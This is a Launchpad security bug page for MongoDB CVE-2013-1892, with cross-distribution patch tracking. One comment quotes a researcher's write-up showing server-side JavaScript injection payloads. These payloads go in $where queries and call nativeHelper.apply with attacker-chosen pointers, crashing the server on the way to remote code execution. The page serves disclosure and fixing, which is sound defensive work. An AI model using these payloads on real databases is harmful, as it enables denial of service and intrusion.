Ubuntu
mongodb package

Unchecked access to SpiderMonkey’s JavaScript nativeHelper function

Bug #1160893 reported by James Page
260
This bug affects 2 people
Affects Status Importance Assigned to Milestone
mongodb (Debian)
Fix Released
Unknown
mongodb (Fedora)
Fix Released
High
mongodb (Ubuntu)
Fix Released
High
James Page
Precise
Fix Released
High
Unassigned

Bug Description

Unchecked access to SpiderMonkey’s JavaScript nativeHelper function. See SERVER-9124, Fix available in 2.2.4, 2.4.2, and 2.0.9.

https://jira.mongodb.org/browse/SERVER-9124

Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

SCRT Information Security reports:

mongodb – SSJI to RCE
Posted on mars 24, 2013 par agixid
Lucky discovery

Trying some server side javascript injection in mongodb, I wondered if it would be possible to pop a shell.
The run method seems good for this :

> run("uname","-a")
Sun Mar 24 07:09:49 shell: started program uname -a
sh1838| Linux mongo 2.6.32-5-686 #1 SMP Sun Sep 23 09:49:36 UTC 2012 i686 GNU/Linux
0
Unfortunately, this command is only effective in mongo client :

> db.my_collection.find({$where:"run('ls')"})
error: {
 "$err" : "error on invocation of $where function:\nJS Error: ReferenceError: run is not defined nofile_a:0",
 "code" : 10071
}
But let’s dig a little bit.

> run
function () {
    return nativeHelper.apply(run_, arguments);
}
So you can run the « run » function directly by calling nativeHelper.apply(run_,["uname","-a"]);
In server side, the result show us that nativeHelper.apply method exists !

> db.my_collection.find({$where:'nativeHelper.apply(run_, ["uname","-a"]);'})
error: {
       "$err" : "error on invocation of $where function:\nJS Error: ReferenceError: run_ is not defined nofile_a:0",
       "code" : 10071
}
So what’s run_ ?

So what's "run_"
> run_
 { "x" : 135246144 }
An associative array, can we use it in server side ?

> db.my_collection.find({$where:'nativeHelper.apply({"x":135246144}, ["uname","-a"]);'})
Sun Mar 24 07:15:26 DBClientCursor::init call() failed
Sun Mar 24 07:15:26 query failed : sthack.my_collection { $where: "nativeHelper.apply({"x":135246144}, ["uname","-a"]);" } to: 127.0.0.1:27017
Error: error doing query: failed
Sun Mar 24 07:15:26 trying reconnect to 127.0.0.1:27017
Sun Mar 24 07:15:26 reconnect 127.0.0.1:27017 failed couldn't connect to server 127.0.0.1:27017
The server crashed \o/ !

Let’s check the source code :
./src/mongo/scripting/engine_spidermonkey.cpp

JSBool native_helper( JSContext *cx , JSObject *obj , uintN argc, jsval *argv , jsval *rval ) {
        try {
            Convertor c(cx);
            NativeFunction func = reinterpret_cast(
                    static_cast( c.getNumber( obj , "x" ) ) );
            void* data = reinterpret_cast<void*>(
                    static_cast( c.getNumber( obj , "y" ) ) );
            verify( func );

            BSONObj a;
            if ( argc > 0 ) {
                BSONObjBuilder args;
                for ( uintN i = 0; i < argc; ++i ) {
                    c.append( args , args.numStr( i ) , argv[i] );
                }
                a = args.obj();
            }

            BSONObj out;
            try {
                out = func( a, data );
            }
            catch ( std::exception& e ) {
nativeHelper is a crazy feature in spidermonkey missused by mongodb:
the NativeFunction func come from x javascript object and then is called without any check !!!

> db.my_collection.find({$where:'nativeHelper.apply({"x":0x31337}, ["uname","-a"]);'})

Sun Mar 24 07:20:03 Invalid access at address: 0x31337 from thread: conn1
Sun Mar 24 07:20:03 Got signal: 11 (Segmentation fault).

External references:
http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/

Revision history for this message
In , Troy (troy-redhat-bugs) wrote :

Has this been tried on the Fedora's mongodb?
I ask that because we use v8 instead of spidermonkey, but I'm not positive that our version of mongodb didn't get something slipped in.

Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

Created mongodb tracking bugs for this issue

Affects: epel-all [bug 928192]

Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

Created mongodb tracking bugs for this issue

Affects: fedora-all [bug 928193]

Revision history for this message
In , Jan (jan-redhat-bugs) wrote :

References:
  http://www.openwall.com/lists/oss-security/2013/03/25/7

Relevant upstream tracker:
  https://jira.mongodb.org/browse/SERVER-9124

James Page (james-page)
Changed in mongodb (Ubuntu):
importance: Undecided → High
status: New → Triaged
Revision history for this message
James Page (james-page) wrote :

Security update for 12.04

Changed in mongodb (Ubuntu Precise):
importance: Undecided → High
Changed in mongodb (Ubuntu):
assignee: nobody → James Page (james-page)
James Page (james-page)
Changed in mongodb (Ubuntu Precise):
status: New → Triaged
Bug Watch Updater (bug-watch-updater)
Changed in mongodb (Debian):
status: Unknown → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package mongodb - 1:2.2.4~rc0-0ubuntu1

---------------
mongodb (1:2.2.4~rc0-0ubuntu1) raring; urgency=low

  * New upstream bugfix release:
    - Includes fix for JavaScript remote code execution security
      issue (LP: #1160893).
      CVE-2013-1892
 -- James Page <email address hidden> Thu, 28 Mar 2013 09:13:20 +0000

Changed in mongodb (Ubuntu):
status: Triaged → Fix Released
Revision history for this message
Aaron Stone (sodabrew) wrote :

Will there be packages built for Lucid, Oneiric, and Precise that are within their support windows?

Revision history for this message
Jamie Strandboge (jdstrand) wrote :

debdiff looks good. Testsuite passes and the build logs look good. Thanks James! Uploaded to the security PPA. I will push out when it finishes building.

Changed in mongodb (Ubuntu Precise):
status: Triaged → Fix Committed
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package mongodb - 1:2.0.4-1ubuntu2.1

---------------
mongodb (1:2.0.4-1ubuntu2.1) precise-security; urgency=low

  * SECURITY UPDATE: Remote code execution vulnerability in Spidermonkey
    JavaScript engine (LP: #1160893).
    - d/p/CVE-2013-1892.1.patch: Avoid raw pointers for SM's nativeHelper.
      Cherry picked from upstream VCS.
    - d/p/CVE-2013-1892.2.patch: Cast id to double before converting to
      JS. Cherry picked from upstream VCS.
    - https://jira.mongodb.org/browse/SERVER-9124
    - CVE-2013-1892
 -- James Page <email address hidden> Thu, 28 Mar 2013 10:04:28 +0000

Changed in mongodb (Ubuntu Precise):
status: Fix Committed → Fix Released
Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

Removed due to typo.

Revision history for this message
In , errata-xmlrpc (errata-xmlrpc-redhat-bugs) wrote :

This issue has been addressed in following products:

  MRG for RHEL-6 v.2

Via RHSA-2013:1170 https://rhn.redhat.com/errata/RHSA-2013-1170.html

Revision history for this message
In , Kurt (kurt-redhat-bugs) wrote :

Red Hat Update Infrastructure 2.1.3 is now in Production 2 Phase of the support and maintenance life cycle. This has been rated as having Important security impact, however as used in RHUI this issue is not exposed to untrusted users, as such it is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Update Infrastructure Life Cycle: https://access.redhat.com/support/policy/updates/rhui.

Bug Watch Updater (bug-watch-updater)
Changed in mongodb (Fedora):
importance: Unknown → High
status: Unknown → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.